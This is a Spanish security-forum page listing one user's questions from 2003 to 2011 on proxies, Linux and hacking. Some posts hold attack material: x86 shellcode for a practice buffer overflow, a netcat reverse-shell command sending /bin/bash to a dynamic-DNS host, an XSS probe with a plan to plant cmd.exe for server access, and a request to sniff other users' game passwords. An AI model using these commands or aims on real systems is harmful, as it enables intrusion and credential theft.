elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
29 Mayo 2012, 04:00  


Tema destacado: Deseas probar algunas mejoras a la interfaz del foro? Prueba cake! acerca de

  Mostrar Mensajes
Páginas: [1] 2 3 4
1  Seguridad Informática / Bugs y Exploits / Ayuda con shellcode en: 31 Marzo 2011, 19:49
saludos

Les comento que recien estoy sumergiendome en el tema de shellcodes y exploits, y tengo el siguiente problema:

Estoy practicando en una aplicacion con un buffer overflow, ya tengo el control del ESP y el el EIP , es decir ya esta listo para ejecutar el shellcode, el que estoy ejecutando es:

Código:
shellcode = ("\x8B\xEC\x33\xFF\x57"
    "\xC6\x45\xFC\x63\xC6\x45"
    "\xFD\x6D\xC6\x45\xFE\x64"
    "\xC6\x45\xF8\x01\x8D"
            "\x45\xFC\x50\xB8\xC7\x93"
            "\xBF\x77\xFF\xD0\x00")"

Sin embargo en el momento de debuggear, sale totalmente modificado el shellcode, he descartado algunas cosas y he visto que  se modifica el los que estan con \xff , bueno en el olly sale asi:

Código:
015DC2E3   8BEC             MOV EBP,ESP
015DC2E5   3357 C6         XOR EDX,DWORD PTR DS:[EDI-3A]
015DC2E8   45                 INC EBP
015DC2E9   DC43 C6       FADD QWORD PTR DS:[EBX-3A]
015DC2EC   45                INC EBP
015DC2ED   FD                STD
015DC2EE   4D                 DEC EBP
015DC2EF   C645 FE 44     MOV BYTE PTR SS:[EBP-2],44
015DC2F3   C645 F8 8D     MOV BYTE PTR SS:[EBP-8],8D
015DC2F7   45                  INC EBP
015DC2F8   DC50 B8         FCOM QWORD PTR DS:[EAX-48]
015DC2FB   C7                  ???                                     
015DC2FC   93                   XCHG EAX,EBX
015DC2FD   BF 57D00000      MOV EDI,0D057
     


Que puede estar pasando,

Gracias por su Respuesta..
2  Comunicaciones / Redes / Conectarse por Doble Proxy en: 18 Agosto 2005, 18:35
Holas .. una consulta tengo mi conexión de esta manera


MIPC-----Proxy-----internet

Pero ese proxy me restringe muchas cosas.. y quisiera saber si es posible conectarme a otro proxy ... de esta manera

MIPC -----Proxy----proxy----Internet

Ya sea con windows o linux..


 Gracias...por sus respuestas .
3  Seguridad Informática / Hacking Básico / Re: sniffear gunbound en: 15 Febrero 2005, 11:59
gracias, por tu respuesta..

a lo que me referia es a la pagina y tambien al login que tiene para ingresar al juego..

y como es eso de envenenamiento ARP puedes darme algunos links para estudiarlo

 gracias

PD : tengo instalando en el servidor el ethereal
4  Seguridad Informática / Hacking Básico / sniffear gunbound en: 15 Febrero 2005, 03:44
holas, tengo acceso a un server pel cual esta conectado a bastantes maqunas ,  quisiera saber si las contraseñas de gunbound viajan encriptadas , y si no por que puerto viajan y como puedo hacer para sniffearlas..


thnaks
5  Sistemas Operativos / GNU/Linux / squid modo comandos en: 18 Julio 2004, 11:40
Holas , tengo un problema:

Estoy instalando un servidor proxy que alimentara de internet a una red de 5 pcs el problema es que, la configuracion sera cambiada a cada momento y quisiera saber si hay alguna manera de echarlo a andar por medio de comandos mas o menos asi:

/sbin/squid start (maquinas_permitidas) (maquinas negadas) (puertos)

sin hacer cambios a cada momento en el archivo conf

gracias
6  Informática / Hardware / Re: AMD o INTEL en: 10 Julio 2004, 09:21
Gracias ;)
7  Informática / Hardware / AMD o INTEL en: 10 Julio 2004, 08:49
Holas, estoy a punto de comprarme nueva pc y quisiera k me digan cual es la diferencia entre procesadores AMD e INTEL y cual recomendarian

GraciAS
8  Sistemas Operativos / GNU/Linux / instalar openGL en gentoo en: 10 Julio 2004, 08:18
holas, tengo instalado un gentoo ocn kernel 2.6.6 , mi tarjeta de video es una SiS 630/730 quisiera por favor que me digan que puedo hacer o que puedo bajar para habilitar el soporte para openGL


Gracias
9  Seguridad Informática / Hacking Básico / acerca del nessus en: 24 Mayo 2004, 13:50
Holas, tengo una red interna  que se conecta por medio de ADSL , la ip se encuentra en el router zyxel y el resto de maquinas es solo con ip's internas.. bueno ,.. quiero instale el nessus en una de mis maquinas que correo con linux suse, todo corrio normal pero al momento de conectarme con el cliente desde la maquina WinXP me conectecto al server nomas , pero al intentar escanear un server me sale error , que falta permisos. pero para escanear el server donde esta instalado el nessus no tengo problemas, que puede pasar?

Gracias
10  Seguridad Informática / Hacking Básico / reverse shell con NC en: 8 Mayo 2004, 10:54
Holas no se si este sera un tema de hack pero en fin...

lei un manual del nc y me dice que puedo desde una maquina linux hacer como telnet a una maquina y cuando el telnet sea exitoso ejetute un archivo ejem /bin/bash, bueno desde la maquina linux pongo esto

#nc -l -vv  -p 4444  jhim.zapto.org  4444 -t -e /bin/bash

y me aparece  esto :

DNS fwd/rev mismatch: jhim.zapto.org != client-xxx.6x.2x3.1x8.speedy.net
listening on [any] 4444 ...

----------

luego en la maquina windows pongo esto:

c:\nc -vv -l -p  4444
listenin on [any] 4444

y  no me aparece nada


cual es la manera correcta???

gracias

 
11  Sistemas Operativos / GNU/Linux / Radio online en linux en: 6 Mayo 2004, 12:16
holas, por fas quisiera saber si hay alguna manera de poner una radio online en un servidor remoto para dirijirlo desde una maquina windows en otro lugar

GRACIAS
12  Seguridad Informática / Hacking Básico / inyeccion de script en server en: 2 Abril 2004, 06:47
Holas, tengo una duda..

me di cuenta que un server permite una inyeccion cd scripts de esta manera

http://server:2301/<script>alert('Test')</script>

Mi pregunta es si se puede meter algun tipo de script para copiar el cmd.exe al /scripts para tener acceso al server o que se podria hacer. . Gracias
13  Sistemas Operativos / GNU/Linux / kazaa y dialogos por msn por voz y por cam en un proxy en: 17 Marzo 2004, 01:16
Holas tengo una red con tres maquinas y un liinux montado como proxy  

  internet---eth0----LINUX(192.168.1.2)-----eth1---LAN (192.168.1.x)

El proxy esta con squid 2.5 funciona con el puerto 8080 en las maquinas
clientes se puede usar webs ademas msn solo chat.


El problema radica en que las maquinas clientes deseo usar el kazaa, emule
y conversacines por voz y webcam y eso no me permite el proxy
como puedo hacer para que se pueda hacer todo eso ????????????

Creo que es con el iptables pero no se como usarlo :S

GRACIAS

PD : De paso no se si me podrian recomendar un buen manual de SAMBA ya que
tambien quiero que sea servidor de archivos
14  Sistemas Operativos / GNU/Linux / Re:Sacar intruso en: 15 Octubre 2003, 23:12
bueno es un servidor web que correo bajo linux red hat 9 el intruso se conecto por ssh , al parecer le saco la contraseña (por ingeneria social o algo asi) al verdadero usuario ,  ya que estaba logueado con distinta ip con la que el usuario verdadero siempre se conecta.....

en ese momento no sabia como desconectarlo, lo que me quedo fue reiniciar el servidor... hay alguna manera de desconectar a ese usuario en ese momento...


gracias
15  Sistemas Operativos / GNU/Linux / Sacar intruso en: 15 Octubre 2003, 09:56
holas...

tengo un red hat 9 instalado..

como puedo hacer para sacar a un usuario que en ese momento se encuentre conectado a mi serviddr

gracias...
Páginas: [1] 2 3 4
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines